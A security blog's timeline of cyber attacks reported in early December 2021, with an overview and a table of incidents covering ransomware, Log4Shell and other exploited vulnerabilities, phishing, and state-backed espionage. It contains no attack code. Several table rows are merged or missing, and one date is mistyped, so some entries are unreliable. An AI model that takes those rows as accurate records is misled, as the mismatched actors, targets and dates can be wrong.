Let’s start the new infosec year with the first cyber attacks timeline of December 2021. In this timeline I have collected 123 events, with a daily average number of 8.2 events, a sharp increase compared to the 100 events collected in the previous timeline (corresponding to a daily average number of 6.67 events/day). Ransomware continues to dominate the threat landscape with a percentage of events directly or indirectly characterized by this attack vector corresponding to 23.6% (29 out of 123 events), very close to the value of the previous timeline (22%).
Another constant trend is the impact of vulnerabilities which characterized 14 out of 123 events (corresponding to 11.4% of events and again very close to 10.4% of the previous timeline). December 2021 will be remembered in the annals of cybersecurity for the severe log4shell vulnerability (CVE-2021-44228) targeting Apache log4j servers, additionally threat actors are continuing to exploit vulnerabilities in the Zoho’s products.
Welcome to the last cyber attacks timeline of 2022! A timeline that marks a sharp decline in the number of recorded events after four consecutive increases…
This blog post lists the main cloud-native threats, that is those cyber events exploiting the cloud in one or more stage of the kill chain. I have collected…
Similarly to what I have done in 2021, I am collecting all the mega breaches (with more than 1 million records leaked). The information is derived from the cyber attacks timelines…
The second cyber attacks timeline of November 2021 is finally out. I have collected 96 events, with a daily average slightly decreasing to 6.4 events/day from…
The first half of December has also seen a new rise in the number of attacks targeting fintech startups: four entities have been severely hit with a total loss of nearly $380 million worth.
Threat actors motivated by cyber espionage continue to be particularly active, especially Nobelium the threat actor behind the Solarwinds massive supply-chain attack, still pretty active against cloud service providers, and also author of a new campaign against French organizations. Other state-sponsored actors active in this period include: Charming Kitten, APT27, and StrongPity. New threat actors were also discovered using innovative attack techniques such as RTF Injection. At least a threat actor, Nickel, suffered a strong blow when its infrastructure was taken down by security researchers.
Last but not least, another interesting element of this timeline is the discovery of several opeations using fake social media account to manipulate the public opinion (coordinated inauthentic behavior).
Expand for details
Enjoy the interactive timeline, and thanks for sharing it, and supporting my work in spreading the risk awareness across the community. Also, don’t forget to follow @paulsparrows on Twitter, or even connect on Linkedin, for the latest updates.
ID
Date Reported
Date Occurred
Date Discovered
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
1
01/12/2021
During Q2 and Q3 2021
During Q2 and Q3 2021
APT Actor from China
Multiple organizations
Researchers from Proofpoint reveal that APT actors from China are now using a novel technique called RTF Template Inject.
Targeted Attack
Multiple Industries
CE
N/A
Proofpoint, China, RTF Template Inject
2
01/12/2021
During Q2 and Q3 2021
During Q2 and Q3 2021
APT Actor from Russia
Multiple organizations
Researchers from Proofpoint reveal that APT actors from Russia are now using a novel technique called RTF Template Inject.
Targeted Attack
Multiple Industries
CE
N/A
Proofpoint, Russia, RTF Template Inject
3
01/12/2021
During Q2 and Q3 2021
During Q2 and Q3 2021
APT Actor from India
Multiple organizations
Researchers from Proofpoint reveal that APT actors from India are now using a novel technique called RTF Template Inject.
Targeted Attack
Multiple Industries
CE
N/A
Proofpoint, India, RTF Template Inject
4
01/12/2021
Between 9/10/2021 and 17/10/2021
17/10/2021
?
Planned Parenthood Los Angeles
Planned Parenthood Los Angeles discloses a data breach after suffering a ransomware attack in October that exposed the personal information of approximately 400,000 patients.
Malware
Human health and social work
CC
US
Planned Parenthood Los Angeles, ransomware
5
01/12/2021
At least since 25/11/2021
25/11/2021
?
Customers of eight Malaysian banks
Researchers from Cyble discover a fake Android app masquerading as a housekeeping service to steal online banking credentials from the customers of eight Malaysian banks.
Malware
Finance and insurance
CC
MY
Cyble, Android
6
01/12/2021
-
-
Emotet
Multiple organizations
The Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.
Malware
Multiple Industries
CC
>1
Emotet, PDF
7
01/12/2021
-
-
?
Online stores
Researchers from Sansec discover NginRAT, a remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions.
Malicious Script Injection
Wholesale and retail
CC
>1
Sansec, NginRAT, Nginx
8
01/12/2021
-
11/10/2021
?
Cox Communications
Cox Communications discloses a data breach after a hacker impersonated a support agent to gain access to customers' personal information.
Account Takeover
Information and communication
CC
US
Cox Communications
9
01/12/2021
During the last few months
-
?
Mobile devices of Iranian citizens
Researchers from Check Point uncover a hacking campaign that involves cyberattackers impersonating Iranian government bodies to infect the mobile devices of Iranian citizens through SMS messages.
Account Takeover
Individual
CC
IR
Check Point, Iran
10
01/12/2021
During 2021
During October 2021
V_V (anti-vaccination conspiracy movement)
Facebook users in Italy and France
Meta removes a network of accounts that originated in Italy and France and targeted medical professionals, journalists, and elected officials with mass harassment.
Fake Social Accounts
Individual
CC
IT
FR
V_V, Meta, Facebook
11
01/12/2021
During 2021
During October 2021
V_V (anti-vaccination conspiracy movement)
Activists in Vietnam
Meta removes a network of accounts that originated in Vietnam for mass reporting against activists and other people who publicly criticized the Vietnamese government.
Fake Social Accounts
Individual
N/A
VN
V_V, Meta, Facebook
12
01/12/2021
During 2021
During November 2021
?
Facebook users in multiple countries
Meta removes 110 Facebook accounts, 78 Pages, 13 Groups and 17 Instagram accounts from Palestine for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
V_V, Meta, Facebook, Palestine
13
01/12/2021
During 2021
During November 2021
?
Facebook users in multiple countries
Meta removes 31 Facebook accounts, four Groups, two Facebook Events and four Instagram accounts from Poland for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
V_V, Meta, Facebook, Poland
14
01/12/2021
During 2021
During October 2021
?
Facebook users in multiple countries
Meta removes 38 Facebook accounts, five Groups, and four Instagram accounts in Belarus for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
V_V, Meta, Facebook, Belarus
15
01/12/2021
During 2021
During October 2021
?
Facebook users in multiple countries
Meta removes 595 Facebook accounts, 21 Pages, four Groups and 86 accounts on Instagram from China for coordinated inauthentic behavior.
Fake Social Accounts
Individual
CW
>1
V_V, Meta, Facebook, China
16
01/12/2021
28/9/2921
11/10/2021
?
Great Plains Manufacturing
Great Plains Manufacturing notifies 4,110 employees that some of their protected health information has potentially been compromised in a cyberattack that was discovered on October 11, 2021.
Unknown
Manufacturing
CC
US
Great Plains Manufacturing
17
01/12/2021
30/11/2021
30/11/2021
?
MonoX Finance
Blockchain startup MonoX Finance discloses that a hacker stole $31 million by exploiting a bug in software the service uses to draft smart contracts.
Vulnerability
Fintech
CC
N/A
MonoX Finance
18
02/12/2021
During the last three months
-
APT27 AKA Emissary Panda
Multiple organizations
Researchers from Palo Alto Networks discover that an APT is exploiting CVE-2021-44077, an unauthenticated remote code execution issue in Zoho ServiceDesk Plus versions 11305 and older.
CVE-2021-44077 Vulnerability
Multiple Industries
CE
>1
Researchers from Palo Alto Networks, CVE-2021-44077, Zoho ServiceDesk Plus
19
02/12/2021
-
-
Government of Mexico
Twitter users
Twitter removes a network of 276 inauthentic accounts that shared primarily civic content, in support of government initiatives related to public health and political parties.
Fake Social Accounts
Individual
N/A
MX
Twitter, Mexico
20
02/12/2021
-
-
People’s Republic of China
Twitter users
Twitter removes a network of 2,048 accounts that amplified Chinese Communist Party narratives related to the treatment of the Uyghur population in Xinjiang. inauthentic accounts that shared primarily civic content, in support of government initiatives related to public health and political parties.
Fake Social Accounts
Individual
N/A
CN
Twitter, China, Uyghur
21
02/12/2021
-
-
People’s Republic of China
Twitter users
Twitter removes a network of 112 accounts connected to “Changyu Culture,” a private company backed by the Xinjiang regional government.
Fake Social Accounts
Individual
N/A
CN
Twitter, China, Changyu Culture
22
02/12/2021
-
-
IRA (Internet Research Agency)
Twitter users in the Central African Republic
Twitter removes a network of 16 accounts linked to the IRA that attempted an information operation in the Central African Republic.
Fake Social Accounts
Public admin and defence, social security
CW
CF
Twitter, IRA Internet Research Agency, Central African Republic, Russia
23
02/12/2021
-
-
IRA (Internet Research Agency)
Twitter users
Twitter removes a network of 50 accounts that attacked the civilian Libyan government and actors that support it, while voicing significant support for Russia’s geopolitical position in Libya and Syria.
Fake Social Accounts
Individual
CW
LY
SY
Twitter, IRA Internet Research Agency, Libya, Syria, Russia
24
02/12/2021
-
-
Tanzania
Twitter users
Twitter removes a network of 268 accounts utilized to file bad faith reports on Twitter, targeting members and supporters of FichuaTanzania and its founder.
Fake Social Accounts
Individual
N/A
TZ
Twitter, Tanzania, FichuaTanzania
25
02/12/2021
-
-
Uganda
Twitter users
Twitter removes a network of 418 accounts engaged in coordinated inauthentic activity in support of Ugandan presidential incumbent Museveni and his party, National Resistance Movement (NRM).
Fake Social Accounts
Individual
N/A
UG
Twitter, Museveni, National Resistance Movement, NRM.
26
02/12/2021
-
-
Venezuela
Twitter users
Twitter removes network of 277 Venezuelan accounts that amplified accounts, hashtags, and topics in support of the government and its official narratives via an app called Twitter Patria.
Fake Social Accounts
Individual
N/A
VE
Twitter, Venezuela, Twitter Patria
27
02/12/2021
Since at least November 2019
-
Cuba
At least 49 organizations from US critical infrastructure sectors.
The Federal Bureau of Investigation (FBI) reveals that the Cuba ransomware gang has compromised the networks of at least 49 organizations from US critical infrastructure sectors.
Malware
Electricity, gas steam, air conditioning
CC
US
Federal Bureau of Investigation, FBI, Cuba, ransomware
28
02/12/2021
Early December 2021
Early December 2021
?
Microsoft 365 users
Resarchers from Mailguard discover a persuasive and ongoing series of phishing attacks use fake Office 365 notifications asking the recipients to review blocked spam messages to steal their Microsoft credentials.
Account Takeover
Multiple Industries
CC
>1
Mailguard, Office 365
29
02/12/2021
-
-
?
Badger
Hackers steal an estimated $120 million worth of Bitcoin and Ether assets from Badger, a decentralized finance (DeFi) platform.
Unknown
Fintech
CC
N/A
Badger
30
02/12/2021
Since at least 2018
-
Magnat
Victims in Canada, the United States, Europe, Australia and Nigeria.
Researchers from Cisco Talos reveal the details of Magnat, a campaign distributing fake versions of popular software to trick users into downloading three forms of malware.
Malvertising
Individual
CC
>1
Cisco Talos, Magnat
31
02/12/2021
Over the past few months
-
Tor2Mine
Multiple organizations
Researchers from Sophos discover a new variant of the Tor2Mine miner using a PowerShell script that attempts to disable malware protection, execute a miner payload and harvest Windows credentials
Malware
Multiple Industries
CC
>1
Sophos, Tor2Mine
32
02/12/2021
Until November 2021
-
Cuba
At least 49 entities in five critical sectors in the U.S
The FBI warns that the Cuba ransomware gang has compromised at least 49 entities in five critical sectors in the U.S. as of November.
Malware
Multiple Industries
CC
US
FBI, Cuba, Ransomware
33
02/12/2021
"Recently"
-
?
Members of the United States military and their families
Researchers at Lookout identify a phishing campaign targeting members of the United States military and their families.
Account Takeover
Public admin and defence, social security
CC
US
Lookout
34
03/12/2021
-
-
?
Vulnerable Zoho systems
Business software provider Zoho urges customers to update their Desktop Central and Desktop Central MSP installations to the latest available version after a critical vulnerability (tracked as CVE-2021-44515) is exploited in the wild.
CVE-2021-44515 vulnerability
Multiple Industries
CC
>1
Zoho, Desktop Central, Desktop Central MSP, CVE-2021-44515
35
03/12/2021
During the last few months
-
?
At least nine U.S. State Department employees
The iPhones of at least nine U.S. State Department employees were hacked by an unknown assailant using the spyware developed by the Israel-based NSO Pegasus.
Targeted Attack
Public admin and defence, social security
CE
US
U.S. State Department, NSO Pegasus
36
03/12/2021
During June 2021
-
BRATA
Android Banking users in Italy
Researchers from Cleafy discover a campaign in Italy exploiting the BRATA Android remote access trojan (RAT), with threat actors calling victims of SMS attacks to steal their online banking credentials.
Malware
Finance and insurance
CC
IT
Cleafy, BRATA, Android
37
03/12/2021
10/12/2020
-
-
Bansley and Kiener LLP
Accountancy firm Bansley and Kiener LLP announces it was the victim of a December 2020 ransomware attack.
Malware
Administration and support service
CC
US
firm Bansley and Kiener LLP, ransomware
38
03/12/2021
3/12/2021
3/12/2021
?
Riverhead Central School District
Riverhead Central School District is hit with a ransomware attack.
Malware
Education
CC
US
Riverhead Central School District , Ransomware
39
03/12/2021
3/12/2021
3/12/2021
?
Ulss 6 Euganea
Ulss 6 Euganea (a local national health unit) is hit with a cyber attack.
Unknown
Human health and social work
CC
IT
Ulss 6 Euganea
40
03/12/2021
Five months ago
-
?
Hisar Health Department
At least 18 fake birth certificates are generated in Hisar, after the Health Department is hacked.
Account Takeover
Public admin and defence, social security
CC
IN
Hisar Health Department
41
04/12/2021
4/12/2021
4/12/2021
?
BitMart
Cryptocurrency exchange reveals that it was hacked for $150 million.
Account Takeover
Fintech
CC
KY
BitMart
42
04/12/2021
-
-
?
Cryptocurrency users
Researchers from Red Canary reveal that threat actors are distributing altered KMSpico installers to infect Windows devices with malware that steals cryptocurrency wallets.
Malware
Fintech
CC
>1
Red Canary, KMSpico
43
04/12/2021
Since early December
2/12/2021
?
Verified Twitter accounts
A new phishing campaign has been targeting verified Twitter accounts
Account Takeover
Individual
CC
>1
Twitter
44
05/12/2021
-
-
RedLine
Multiple organizations
Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.
Malware
Multiple Industries
CC
>1
RedLine
45
05/12/2021
4/12/2021
4/12/2021
?
SPAR
Approximately 330 SPAR shops in northern England face severe operational problems following a weekend cyberattack, forcing many stores to close or switch to cash-only payments.
Unknown
Wholesale and retail
CC
UK
SPAR
46
05/12/2021
5/12/2021
5/12/2021
?
Maryland’s health department
A cyberattack takes Maryland’s health department offline.
Unknown
Human health and social work
CC
US
Maryland’s health department
47
06/12/2021
Since 2020
-
Nobelium
Cloud providers and MSPs
Researchers from Mandiant reveal that the Nobelium hacking group continues to breach government and enterprise networks worldwide by targeting their cloud and managed service providers and using a new custom "Ceeloader" malware.
Targeted Attack
Professional, scientific and technical
CE
>1
Mandiant, Nobelium, Ceeloader
48
06/12/2021
Since February 2021
-
Nobelium
French organizations
The French national cyber-security agency ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information)says that the Russian-backed Nobelium hacking group has been targeting French organizations since February 2021.
Targeted Attack
Multiple Industries
CE
FR
ANSSI, Agence Nationale de la Sécurité des Systèmes d'Information, Nobelium
49
06/12/2021
Since at least 2019
-
Nickel (AKA KE3CHANG, APT15, Vixen Panda, Royal APT, and Playful Dragon)
Multiple organizations
Microsoft seizes dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide.
Targeted Attack
Multiple Industries
CE
>1
Microsoft, Nickel, KE3CHANG, APT15, Vixen Panda, Royal APT, Playful Dragon
50
06/12/2021
2/12/2021
2/12/2021
Conti
Nordic Choice Hotels
Nordic Choice Hotels confirms a cyber attack on its systems from the Conti ransomware group.
Malware
Accommodation and food service
CC
NO
Nordic Choice Hotels, Conti, ransomware
51
06/12/2021
-
-
?
Multiple organizations
Researchers from Sucuri reveal that threat actors are injecting credit card swipers into random plugins of e-commerce WordPress sites.
Malicious Script Injection
Multiple Industries
CC
>1
Sucuri, WordPress
52
06/12/2021
-
-
Moobot
Vulnerable Hikvision products
Researchers from Fortinet reveal that a Mirai-based botnet called 'Moobot' is spreading aggressively via exploiting a critical command injection flaw in the webserver of many Hikvision products.
CVE-2021-36260 vulnerability
Multiple Industries
CC
>1
Fortinet, Moobot, Hikvision
53
06/12/2021
Since March 2021
-
?
More than 300 e-commerce stores
Researchers from Gemini Advisory reveal that threat actors have abused a legitimate feature of the Google Tag Manager service to secretly add and deploy malicious JavaScript code to more than 300 e-commerce stores since March this year.
Malicious Script Injection
Wholesale and retail
CC
>1
Gemini Advisory, Google Tag Manager
54
06/12/2021
11/7/2021
21/10/2021
HelloKitty
Oregon Anesthesiology Group (OAG)
The Oregon Anesthesiology Group (OAG) said it suffered a ransomware attack in July that led to the breach of the personal information of 750,000 patients and 522 current and former OAG employees.
Google announces that it has taken action to disrupt the Glupteba botnet that controls more than 1 million Windows PCs around the world, growing by thousands of new infected devices each day.
Malware
Multiple Industries
CC
>1
Google, Glupteba
56
07/12/2021
-
-
?
Misconfigured QNAP Devices
QNAP warns customers today of ongoing attacks targeting their NAS devices with a cryptomining malware (oom_reaper), urging them to take measures to protect them immediately.
Misconfiguration
Multiple Industries
CC
>1
QNAP, crypto, oom_reaper
57
07/12/2021
Since early December 2021
Early December 2021
Cerber
Vulnerable Confluence and GitLab servers
The Cerber ransomware is back, as a new ransomware family with the old name, and targets Atlassian Confluence and GitLab servers using remote code execution vulnerabilities (respectively CVE-2021-26084 and CVE-2021-22205 for Confluence and GitLab)
Malware
Multiple Industries
CC
>1
Cerber, ransomware, Confluence, GitLab
58
07/12/2021
Since October 2021
-
Multiple threat actors
US Universities
Researchers from Proofpoint reveal that US universities are being targeted in multiple phishing attacks, using COVID-19 Omicron lures, designed to impersonate college login portals to steal valuable Office 365 credentials.
Account Takeover
Education
CC
US
Proofpoint, US universities, Office 365, COVID-19, Omicron
59
07/12/2021
Since 8 years-
During 2020 and 2021
XE Group
Multiple organizations
Researchers from Volexity reveal the details of XE Group, a Vietnamese-origin criminal threat actor linked to eight years of for-profit hacking and credit card skimming.
Malicious Script Injection
Multiple Industries
CC
>1
Volexity, XE Group, Vietnam
60
07/12/2021
7/12/2021
7/12/2021
Emotet
Multiple organizations
The Emotet malware starts to install Cobalt Strike beacons directly, giving immediate network access to threat actors and facilitating ransomware attacks.
Malware
Multiple Industries
CC
>1
Emotet, Cobalt Strike
61
07/12/2021
18/07/2021 and 18/09/2021
-
?
Sound Generations
Sound Generations announces that unauthorized individuals have gained access to its internal systems and have used ransomware to encrypt files in two separate attacks.
Malware
Human health and social work
CC
US
Sound Generations
62
07/12/2021
1/6/2021
Between 25/05/2021 and 01/06/2021
?
Saltzer Health
Saltzer Health reveals to have suffered a phishing attack.
Account Takeover
Human health and social work
CC
US
Saltzer Health
63
07/12/2021
21/9/2021
-
?
Boulder Neurosurgical and Spine Associates
Boulder Neurosurgical and Spine Associates reveals to have suffered a phishing attack.
Account Takeover
Human health and social work
CC
US
Boulder Neurosurgical and Spine Associates
64
07/12/2021
30/9/2021
-
?
Region IV Area Agency on Aging
Region IV Area Agency on Aging reveals to have suffered a phishing attack.
Account Takeover
Human health and social work
CC
US
Region IV Area Agency on Aging
65
07/12/2021
Since September 2021
-
?
Individuals
Scammers are using fake job listings from multiple game studios including Riot Games to empty the wallets of young, hopeful victims looking to break into the gaming industry.
Fake job listings
Individual
CC
>1
Riot Games
66
07/12/2021
6/12/2021
6/12/2021
?
Pellissippi State Community College
Pellissippi State Community College discloses a ransomware attack.
Malware
Education
CC
US
Pellissippi State Community College, ransomware
67
07/12/2021
7/12/2021
7/12/2021
?
Eldon School District
Eldon School District is hit with a ransomware attack.
Malware
Education
CC
US
Eldon School District
68
08/12/2021
-
During the first week of December
Dark Mirai
Vulnerable TP-Link Routers
Researchers from Fortinet discover that the botnet known as Dark Mirai (AKA MANGA, Dark.IoT) is exploiting a new vulnerability on the TP-Link TL-WR840N EU V5, a popular inexpensive home router released in 2017.
CVE-2021-41653 vulnerability
Multiple Industries
CC
>1
Fortinet, Dark Mirai, MANGA, Dark.IoT, TP-Link, TL-WR840N EU V5, CVE-2021-4165
69
08/12/2021
-
During the first week of December 2021
?
Multiple organizations
Researchers from jFrog discover 17 additional malicious npm packages caught stealing Discord tokens and environment variables.
Malware
Multiple Industries
CC
>1
jFrog, npm, Discord
70
08/12/2021
During 2021
-
TAG-16
Several high-profile military and government organizations across Southeast Asia
Researchers from Recorded Future’s Insikt Group reveal the details of TAG-16, a Chinese state-sponsored group which has compromised several high-profile military and government organizations across Southeast Asia throughout 2021 using custom malware families such as FunnyDream and Chinoxy
Targeted Attack
Public admin and defence, social security
CE
>1
Recorded Future, Insikt Group, TAG-16, FunnyDream, Chinoxy, China
71
08/12/2021
During 2021
-
Suspected Chinese state-sponsored
Entities in Cambodia
Researchers from Recorded Future’s Insikt Group discover a campaign carried out by a Chinese state-sponsored group targeting entities in Laos including the Cambodia’s Sihanoukville Autonomous Port (PAS).
Targeted Attack
Multiple Industries
CE
KH
Recorded Future, Insikt Group, Cambodia, China, Sihanoukville Autonomous Port, PAS
72
08/12/2021
During 2021
-
Suspected Chinese state-sponsored
Entities in Laos
Researchers from Recorded Future’s Insikt Group discover a campaign carried out by a Chinese state-sponsored group targeting entities in Laos including the National Committee for Special Economic Zones (SEZs) and National Enterprise Database (NED)
Targeted Attack
Multiple Industries
CE
LA
Recorded Future, Insikt Group, Laos, China, National Committee for Special Economic Zones, SEZs, National Enterprise Database, NED
73
08/12/2021
25/7/2021
25/7/2021
?
Atalanta
North American food importer Atalanta admits that it suffered a data breach involving employees’ personal information as the result of a ransomware attack.
Malware
Accommodation and food service
CC
US
Atalanta
74
08/12/2021
-
15/9/2021
?
Valley Mountain Regional Center
Valley Mountain Regional Center notifies 17,197 patients that some of their protected health information was stored in email accounts that were accessed by unauthorized individuals.
Account Takeover
Human health and social work
CC
US
Valley Mountain Regional Center
75
09/12/2021
-
30/11/2021
StrongPity AKA APT-C-41 and PROMETHIUM
Multiple targets
Researchers from Minerva Labs reveal the details of the latest campaign of the StrongPity APT using a malicious version of the popular Notepad++ application.
Security researchers discover a new ransomware written in Rust
Malware
Multiple Industries
CC
>1
ALPHV. BlackCat, ransomware, Rust
77
09/12/2021
During the last two days
-
?
Vulnerable WordPress sites
Researchers from Wordfence detect a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites, targeting four WordPress plugins (PublishPress Capabilities, Kiwi Social Plugin, Pinterest Automatic, WordPress Automatic) and fifteen Epsilon Framework themes
Researchers from Cofense discover a new phishing campaign targeting German e-banking users, involving QR codes in the credential-snatching process.
Account Takeover
Finance and insurance
CC
DE
Cofense, QR Codes
79
09/12/2021
During December 2021
During December 2021
?
Microsoft 365 users
Researchers from Avanan discover a phishing campaign taking advantage of the Outlook productivity features to make the spoofed message more credible.
Account Takeover
Multiple Industries
CC
>1
Avanan, Microsoft Outlook
80
09/12/2021
9/12/2021
9/12/2021
?
Oahu Transit Services
Oahu Transit Services, a transport operator in Hawaii is hit with a possible ransomware attack.
Malware
Transportation and storage
CC
US
Oahu Transit Services, ransomware
81
09/12/2021
9/12/2021
9/12/2021
?
Municipality of Nowiny
The Municipality of Nowiny is hit with a ransomware attack.
Malware
Public admin and defence, social security
CC
PL
Municipality of Nowiny, ransomware
82
10/12/2021
-
-
Snatch
Volvo Cars
Swedish carmaker Volvo Cars discloses that attackers have stolen research and development information after hacking some of its servers.
Unknown
Manufacturing
CC
SE
Volvo Cars, Snatch
83
10/12/2021
10/12/2021
10/12/2021
Multiple threat actors
Vulnerable Apache Log4j servers
Threat actors start to massively scan vulnerable Apache Log4j servers after a severe vulnerability is disclosed.
CVE-2021-44228 Vulnerability
Multiple Industries
CC
>1
Apache Log4j, CVE-2021-44228, Log4Shell
84
10/12/2021
During Q3 2021
During Q3 2021
Karakurt
Over 40 victims worldwide
Researchers from Accenture reveal the details of Karakurt, a financially motivated threat actor, primarily using VPN credentials to gain initial access to a victim's network.
Account Takeover
Multiple Industries
CC
>1
Accenture, Karakurt
85
10/12/2021
Since November 2021
-
Conti
Multiple organizations in Australia
The Australian Cyber Security Centre (ACSC) says Conti ransomware attacks have targeted multiple Australian organizations from various industry verticals.
Malware
Multiple Industries
CC
AU
Conti, Ransomware, Australian Cyber Security Centre, ACSC
86
10/12/2021
"Recently"
-
Agent Tesla
Users in Korea
Researchers from Fortinet discover a new variant of the Agent Tesla malware distributed in an ongoing phishing campaign that relies on Microsoft PowerPoint documents laced with malicious macro code.
Malware
Individual
CC
KR
Fortinet, Agent Tesla
87
10/12/2021
9/12/2021
9/12/2021
RansomEXX
Hellmann Worldwide Logistics
German logistics provider Hellmann Worldwide Logistics is hit with a ransomware attack.
The Python Package Index (PyPI) registry removes three malicious Python packages (aws-login0tool, dpp-client, dpp-client1234) aimed at exfiltrating environment variables and dropping trojans on the infected machines. The malicious packages are estimated to have generated over 10,000 downloads
Workforce management solutions provider UKG discloses to have suffered a ransomware attack.
Malware
Professional, scientific and technical
CC
UK
Kronos, UKG, ransomware
99
13/12/2021
-
-
TinyNuke
Corporate addresses and individuals working in manufacturing, technology, construction, and business services in France
Researchers from Proofpoint discover a new campaign distributing the info-stealing malware TinyNuke, and targeting French users with invoice-themed lures.
Malware
Multiple Industries
CC
FR
Proofpoint, TinyNuke
100
13/12/2021
-
-
?
Chrome users
Google releases Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild.
CVE-2021-4102 Vulnerability
Unknown
CC
N/A
Google, Chrome 96.0.4664, CVE-2021-4102
101
13/12/2021
12/12/2021
12/12/2021
?
Indian Prime Minister Narendra Modi's Twitter account
Indian Prime Minister Narendra Modi's Twitter account is hacked with a message declaring his country had adopted bitcoin as legal tender and was distributing the cryptocurrency to citizens.
Account Takeover
Individual
CC
IN
Narendra Modi, Twitter
102
13/12/2021
6/12/2021
6/12/2021
?
Shelley School District
The Shelley School District is the victim of a ransomware attack.
Malware
Education
CC
US
Shelley School District, ransomware
103
13/12/2021
12/11/2021
-
?
ScansStat Technologies
ScansStat Technologies informs that bad actors posing as pharmacies had managed to get ScansStat to send them patient information.
Account Takeover
Professional, scientific and technical
CC
US
ScansStat Technologies
104
13/12/2021
10/12/2021
10/12/2021
?
City of Lexington
The city of Lexington takes the majority of its Internet-connected services offline after discovering an "external interference."
Unknown
Public admin and defence, social security
CC
US
City of Lexington
105
13/12/2021
-
-
TellYouThePass
Windows and Linux devices
Threat actors revive an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting the critical remote code execution bug in the Apache Log4j library.
VulcanForged, a cryptocurrency gaming company is hit by hackers who steal more than $400 million.
Unknown
Fintech
CC
N/A
VulcanForged
107
14/12/2021
-
-
Threat actors originating from China, Iran, North Korea, and Turkey
Multiple organizations
Researches from Microsoft reveal that nation-state attackers are now trying to exploit the log4shell vulnerability.
CVE-2021-44228 Vulnerability
Multiple Industries
CE
>1
Apache Log4j, CVE-2021-44228, Log4Shell
108
14/12/2021
Early December 2021
Early December 2021
?
Behavioral Health Group
Opioid treatment network Behavioral Health Group suffered a cyberattack that led to an almost week-long disruption of IT systems and patient care.
Unknown
Human health and social work
CC
US
Behavioral Health Group
109
14/12/2021
-
-
Anubis
Mobile banking users
Researchers from Lookout discover a new Anubis campaign targeting the customers of nearly 400 financial institutions.
Malware
Finance and insurance
CC
>1
Lookout, Anubis
110
14/12/2021
Since April 2021
-
?
Servers in Malaysia, Mongolia, Indonesia, and the Philippines.
Researchers from Kaspersky reveal the details of Owowa, a malicious IIS web server module on Microsoft Exchange Outlook Web Access servers, used to steal credentials and execute commands on the server remotely.
Malicious OWA Module
Multiple Industries
CC
>1
Kaspersky, Owowa, IIS, Microsoft Exchange, Outlook Web Access
111
14/12/2021
Over the past six months
-
MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros)
Telecommunication and IT service providers in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos
Researchers from Symantec reveal the details of the latest campaign of the Iranian backed Seedworm group.
Researchers from Prevailion identify DarkWatchman, a new malicious javascript-based Remote Access Trojan (RAT).
Malware
Multiple Industries
CC
RU
Prevailion, DarkWatchman
113
14/12/2021
-
-
Multiple threat actors
Undisclosed organizations
Microsoft releases 67 security fixes including seven critical issues and a zero-day flaw (CVE-2021-43890) being actively exploited by cybercriminals.
CVE-2021-43890 vulnerability
Unknown
N/A
N/A
CVE-2021-43890, Microsoft
114
14/12/2021
12/12/2021
12/12/2021
?
Superior Plus
Major natural gas supplier Superior Plus announces that it is suffering from a ransomware attack.
Malware
Electricity, gas steam, air conditioning
CC
US
Superior Plus, Ransomware
115
14/12/2021
12/12/2021
12/12/2021
?
Virginia’s Division of Legislative Automated Systems
Virginia’s Division of Legislative Automated Systems is hit with a ransomware attack.
Malware
Professional, scientific and technical
CC
US
Virginia’s Division of Legislative Automated Systems, ransomware
116
14/12/2021
13/12/2021
13/12/2021
?
Brazil's Ministry of Health (MoH)
The Brazil's Ministry of Health (MoH) suffers a second cyber attack.
Unknown
Human health and social work
CC
BR
Brazil's Ministry of Health, MoH
117
14/12/2021
Since July 2020
-
Earth Centaur, previously known as Tropic Trooper
Transportation and government agencies
Researchers from Trend Micro reveal a resurgence of attacks carried out by the Earth Centaur threat actor.
Targeted Attack
Multiple Industries
CE
>1
Earth Centaur, Tropic Trooper, Trend Micro
118
14/12/2021
-
-
?
Eastern Health
Eastern Health suffers a cyber attack.
Unknown
Human health and social work
CC
US
Eastern Health
119
14/12/2021
14/12/2021
14/12/2021
?
North Shore Hebrew Academy High School
The North Shore Hebrew Academy High School is defaced with Nazi images.
Defacement
Education
CC
US
North Shore Hebrew Academy High School
120
15/12/2021
Since 2019
-
MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros)
Unnamed Asian airline
Researchers from IBM X-Force reveal that the MuddyWater group is deploying a newly discovered backdoor named 'Aclip' that abuses the Slack API for covert communications, targeting an unnamed Asian airline.
Portland brewery and hotel chain McMenamins suffers a Conti ransomware attack that disrupts the company's operations.
Malware
Accommodation and food service
CC
US
McMenamins, Conti, ransomware
122
15/12/2021
15/12/2021
15/12/2021
Emotet
Multiple organizations
A new wave of Emotet attacks drop the Cobalt Strike beacons for faster attacks.
Malware
Multiple Industries
CC
>1
Emotet, Cobalt Strike
123
15/12/2021
-
-
?
Multiple organizations
Researchers from Juniper reveal that threat actors exploiting the Apache Log4j vulnerability are switching from LDAP callback URLs to RMI to inject Monero miners.
Researchers from Check Point reveal that the Iran-linked hacking group Charming Kitten attacked seven Israeli targets including the Israeli "government and business sector".
Unknown
Multiple Industries
CW
IL
Check Point, Charming Kitten
125
15/12/2021
01/04/2021
01/11/2021
?
Pro Wrestling Tees
Popular wrestling t-shirt site Pro Wrestling Tees discloses a data breach incident that has resulted in the compromise of the financial details of tens of thousands of its customers.
Unknown
Arts entertainment, recreation
CC
US
Pro Wrestling Tees
126
15/12/2021
Between April and June 2019
-
?
Regional Cancer Care Associates (RCCA)
Regional Cancer Care Associates has some employee email compromised in a phishing attack.
Account Takeover
Human health and social work
CC
US
Regional Cancer Care Associates, RCCA
ID
Date Reported
Date Occurred
Date Discovered
Author
Target
